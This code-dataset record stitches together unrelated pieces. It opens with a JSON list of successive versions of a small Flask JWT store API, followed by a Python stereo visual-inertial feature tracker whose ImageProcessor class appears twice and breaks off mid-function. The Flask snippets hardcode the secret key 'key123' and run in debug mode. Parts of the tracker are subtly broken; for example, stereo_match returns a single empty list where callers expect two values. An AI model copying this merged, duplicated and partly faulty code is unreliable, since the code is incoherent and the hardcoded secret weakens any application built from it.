"step-2": "<mask token>\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(StoreList, '/stores')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',\n 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'key123'\napi = Api(app)\njwt = JWT(app, authenticate, identity)\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(StoreList, '/stores')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(debug=True)\n",
"step-4": "import os\nfrom flask import Flask\nfrom flask_restful import Api\nfrom flask_jwt import JWT, timedelta\nfrom security import authenticate, identity\nfrom resources.user import UserRegister\nfrom resources.item import Item, ItemList\nfrom resources.store import Store, StoreList\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL',\n 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.secret_key = 'key123'\napi = Api(app)\njwt = JWT(app, authenticate, identity)\napi.add_resource(Store, '/store/<string:name>')\napi.add_resource(Item, '/item/<string:name>')\napi.add_resource(ItemList, '/items')\napi.add_resource(StoreList, '/stores')\napi.add_resource(UserRegister, '/register')\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(debug=True)\n",
"step-5": "# create item based on name using post method, get specific item or list of items using get method, update item using put and delete item using del method.\nimport os\n\nfrom flask import Flask\nfrom flask_restful import Api\nfrom flask_jwt import JWT, timedelta\n\nfrom security import authenticate, identity\nfrom resources.user import UserRegister\nfrom resources.item import Item,ItemList\nfrom resources.store import Store, StoreList\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', 'sqlite:///data.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # turn off flask SQLAlchemy modification.\napp.secret_key = 'key123'\napi = Api(app)\n\njwt = JWT(app, authenticate, identity)\n\napi.add_resource(Store,'/store/<string:name>')\napi.add_resource(Item,'/item/<string:name>') # http://localhost:5000/student/Rolf\napi.add_resource(ItemList,'/items')\napi.add_resource(StoreList,'/stores')\napi.add_resource(UserRegister, '/register')\n\n\nif __name__ == '__main__':\n from db import db\n db.init_app(app)\n app.run(debug=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Reconstructed preamble (the original header was elided). The imports and
# helper types below are inferred from their usage in this file; `skew` is
# assumed to live in the project's utils module and to return the 3x3
# skew-symmetric matrix of a 3-vector.
import time
from collections import defaultdict, namedtuple
from itertools import chain

import cv2
import numpy as np

from utils import skew  # assumed project-local helper


class FeatureMetaData(object):
    """
    Per-feature bookkeeping: id, detector response, track lifetime and the
    observed image point in each camera.
    """
    def __init__(self):
        self.id = None           # int
        self.response = None     # float
        self.lifetime = None     # int
        self.cam0_point = None   # (x, y)
        self.cam1_point = None   # (x, y)


class FeatureMeasurement(object):
    """
    Stereo measurement of a feature (undistorted pixel coordinates).
    """
    def __init__(self):
        self.id = None
        self.u0 = None
        self.v0 = None
        self.u1 = None
        self.v1 = None


def select(data, selectors):
    """Keep the elements of `data` whose corresponding selector is truthy."""
    return [d for d, s in zip(data, selectors) if s]

class ImageProcessor(object):
    """
    Detects and tracks features in stereo image sequences, aided by IMU
    gyro readings for tracking prediction.
    """
def __init__(self, config):
self.config = config
self.is_first_img = True
self.next_feature_id = 0
self.detector = cv2.FastFeatureDetector_create(self.config.
fast_threshold)
self.imu_msg_buffer = []
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
self.curr_cam1_pyramid = None
self.prev_features = [[] for _ in range(self.config.grid_num)]
self.curr_features = [[] for _ in range(self.config.grid_num)]
self.num_features = defaultdict(int)
self.cam0_resolution = config.cam0_resolution
self.cam0_intrinsics = config.cam0_intrinsics
self.cam0_distortion_model = config.cam0_distortion_model
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs
self.cam1_resolution = config.cam1_resolution
self.cam1_intrinsics = config.cam1_intrinsics
self.cam1_distortion_model = config.cam1_distortion_model
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs
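        # Extrinsics between each camera and the IMU, obtained by inverting
        # the transforms supplied in the config; rotation and translation
        # parts are cached separately for convenience.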
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
self.create_image_pyramids()
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
elif not self.config.load_features_flag:
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
            # (The draw_features_stereo debug visualization was removed from
            # this version; its leftover timing hooks are dropped here.)
print('===image process elapsed:', time.time() - start,
f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
        (Building true pyramids via cv2.buildOpticalFlowPyramid does not
        seem to work reliably from Python, so the raw images are used.)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
        Initialize the image processing sequence: detect new features on the
        first pair of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
new_features = self.detector.detect(img)
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def track_features(self):
"""
        Track features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
self.num_features['before_tracking'] = len(prev_cam0_points)
if len(prev_cam0_points) == 0:
return
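        # Predict where each feature moved using the gyro-integrated
        # rotation, then refine the prediction with pyramidal LK tracking.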
curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,
cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.
prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.
astype(np.float32), curr_cam0_points.astype(np.float32), **self
.config.lk_params)
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
track_inliers[i] = 0
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points,
match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points,
match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points,
match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
self.num_features['after_matching'] = len(curr_matched_cam0_points)
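        # Two-point RANSAC is bypassed in this version: every stereo match
        # is marked as an inlier and simply re-bucketed into the grid.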
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y - 3:y + 4, x - 3:x + 4] = 0
new_features = self.detector.detect(curr_img, mask=mask)
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x: x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def prune_features(self):
"""
        Remove features from any grid cell that holds more than the allowed
        maximum, keeping the per-cell feature count bounded; the
        longest-lived features are retained.
"""
for i, features in enumerate(self.curr_features):
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x: x.
lifetime, reverse=True)[:self.config.grid_max_feature_num]
    def publish(self):
        """
        Reconstructed sketch (the original body was elided): package the
        current features as undistorted stereo measurements for the backend.
        The exact message layout below is an assumption mirroring the field
        names used elsewhere in this file.
        """
        curr_ids = []
        curr_cam0_points = []
        curr_cam1_points = []
        for feature in chain.from_iterable(self.curr_features):
            curr_ids.append(feature.id)
            curr_cam0_points.append(feature.cam0_point)
            curr_cam1_points.append(feature.cam1_point)
        curr_cam0_points_undistorted = self.undistort_points(
            curr_cam0_points, self.cam0_intrinsics,
            self.cam0_distortion_model, self.cam0_distortion_coeffs)
        curr_cam1_points_undistorted = self.undistort_points(
            curr_cam1_points, self.cam1_intrinsics,
            self.cam1_distortion_model, self.cam1_distortion_coeffs)
        features = []
        for i in range(len(curr_ids)):
            fm = FeatureMeasurement()
            fm.id = curr_ids[i]
            fm.u0, fm.v0 = curr_cam0_points_undistorted[i]
            fm.u1, fm.v1 = curr_cam1_points_undistorted[i]
            features.append(fm)
        feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(
            self.cam0_curr_img_msg.timestamp, features)
        return feature_msg
def save_features(self):
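        # Persist the per-grid feature lists for this frame so a later run
        # can replay them via load_features instead of re-detecting.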
filename = self.config.result_dir + str(self.image_id) + '.npz'
np.savez(filename, self.curr_features)
self.image_id += 1
    def load_features(self):
        # Reconstructed counterpart of save_features (the original body was
        # elided): replay the per-grid feature lists saved for this image id.
        filename = self.config.result_dir + str(self.image_id) + '.npz'
        self.curr_features = np.load(filename, allow_pickle=True)['arr_0']
        self.image_id += 1
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= idx_end - idx_begin
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
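        # Rotation over dt from the mean angular velocity: Rodrigues turns
        # the rotation vector w*dt into a matrix, and the transpose maps
        # vectors from the previous frame into the current frame.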
dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.
timestamp)
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
def get_grid_size(self, img):
"""
        Size of each grid cell, in pixels.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
        Compensates for the rotation between consecutive camera frames so
        that feature tracking is more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
intrinsics: intrinsic matrix of the camera. (vec3)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
if len(input_pts) == 0:
return []
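        # Rotation-only motion induces the infinite homography
        # H = K @ R_p_c @ K^-1; applying it to each pixel predicts where
        # that feature lands in the current frame.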
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
        if len(cam0_points) == 0:
            # Callers unpack two values, so return an empty pair.
            return [], []
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs, R_cam0_cam1)
cam1_points = self.distort_points(cam0_points_undistorted, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,
cam1_points, **self.config.lk_params)
cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,
cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),
err < 3, disparity < 20])
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
inlier_markers[i] = 0
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
E = skew(t_cam0_cam1) @ R_cam0_cam1
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
cam1_points_undistorted = self.undistort_points(cam1_points, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.
cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.
cam1_intrinsics[1])
for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
            error = np.abs((pt1 * epipolar_line).sum()) / np.linalg.norm(
                epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
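    # Notes on the three rejection tests above. The skew() helper is defined
    # outside this excerpt; the standard cross-product matrix is assumed:
    #
    #   def skew(v):
    #       return np.array([[0.0, -v[2], v[1]],
    #                        [v[2], 0.0, -v[0]],
    #                        [-v[1], v[0], 0.0]])
    #
    # 1. Forward-backward LK: tracking cam0 -> cam1 -> cam0 must land within
    #    3 px of the starting point (err < 3).
    # 2. The LK-refined cam1 point may drift at most 20 px vertically from
    #    its epipolar prediction (disparity < 20).
    # 3. The point-to-epipolar-line distance |pt1 . (E @ pt0)| / |l[:2]| must
    #    stay below stereo_threshold, measured in normalized pixel units.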
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
            rectification_matrix: rotation applied to the normalized points
                before reprojection (defaults to identity).
            new_intrinsics: intrinsics of the output frame; the default
                [1, 1, 0, 0] yields normalized coordinates.
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,
new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.undistortPoints(pts_in, K,
distortion_coeffs, rectification_matrix, K_new)
else:
pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,
None, rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
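    # Hedged usage sketch (the intrinsics and coefficients below are
    # placeholders, not calibration data). With the default new_intrinsics
    # [1, 1, 0, 0] the output is in *normalized* image coordinates, which is
    # exactly how stereo_match() uses it before re-distorting into cam1:
    #
    #   pts = np.array([[320.0, 240.0]])
    #   intr = [458.0, 457.0, 367.0, 248.0]        # fx, fy, cx, cy
    #   dist = np.array([-0.28, 0.07, 0.0, 0.0])   # radtan example coeffs
    #   norm_pts = self.undistort_points(pts, intr, 'radtan', dist)
    #   # norm_pts ~ [[(320-367)/458, (240-248)/457]] up to distortion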
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
else:
homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.
zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
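    # Consistency sketch: re-distorting the normalized output of
    # undistort_points() with the same (assumed) intrinsics should recover
    # the original pixel to roughly sub-pixel accuracy, since undistortion
    # is an iterative inverse of this projection:
    #
    #   back = self.distort_points(norm_pts, intr, 'radtan', dist)
    #   # np.allclose(back, pts, atol=1e-2) is expected to hold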
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
class ImageProcessor(object):
    """
    Detect and track features in image sequences.
    """
def __init__(self, config):
self.config = config
self.is_first_img = True
self.next_feature_id = 0
self.detector = cv2.FastFeatureDetector_create(self.config.
fast_threshold)
self.imu_msg_buffer = []
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
self.curr_cam1_pyramid = None
self.prev_features = [[] for _ in range(self.config.grid_num)]
self.curr_features = [[] for _ in range(self.config.grid_num)]
self.num_features = defaultdict(int)
self.cam0_resolution = config.cam0_resolution
self.cam0_intrinsics = config.cam0_intrinsics
self.cam0_distortion_model = config.cam0_distortion_model
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs
self.cam1_resolution = config.cam1_resolution
self.cam1_intrinsics = config.cam1_intrinsics
self.cam1_distortion_model = config.cam1_distortion_model
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
self.create_image_pyramids()
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
elif not self.config.load_features_flag:
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
            t = time.time()
            # self.draw_features_stereo()  # optional visualization, disabled
            print('___draw_features_stereo:', time.time() - t)
print('===image process elapsed:', time.time() - start,
f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
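    # Hedged driver sketch. The message types are assumed to be simple
    # namedtuples; the actual dataset reader lives outside this excerpt:
    #
    #   CamMsg = namedtuple('CamMsg', ['timestamp', 'image'])
    #   StereoMsg = namedtuple('StereoMsg',
    #                          ['timestamp', 'cam0_msg', 'cam1_msg'])
    #
    #   proc = ImageProcessor(config)
    #   for imu in imu_stream:       # objects with .timestamp and
    #       proc.imu_callback(imu)   # .angular_velocity (3-vector)
    #   msg = StereoMsg(t, CamMsg(t, img0), CamMsg(t, img1))
    #   feature_msg = proc.stereo_callback(msg)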
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
        (Pyramid construction seems not to work from Python, so the raw
        image is used directly.)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
        Initialize the image processing sequence, which basically detects
        new features on the first set of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
new_features = self.detector.detect(img)
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def track_features(self):
"""
        Track features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
self.num_features['before_tracking'] = len(prev_cam0_points)
if len(prev_cam0_points) == 0:
return
curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,
cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.
prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.
astype(np.float32), curr_cam0_points.astype(np.float32), **self
.config.lk_params)
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
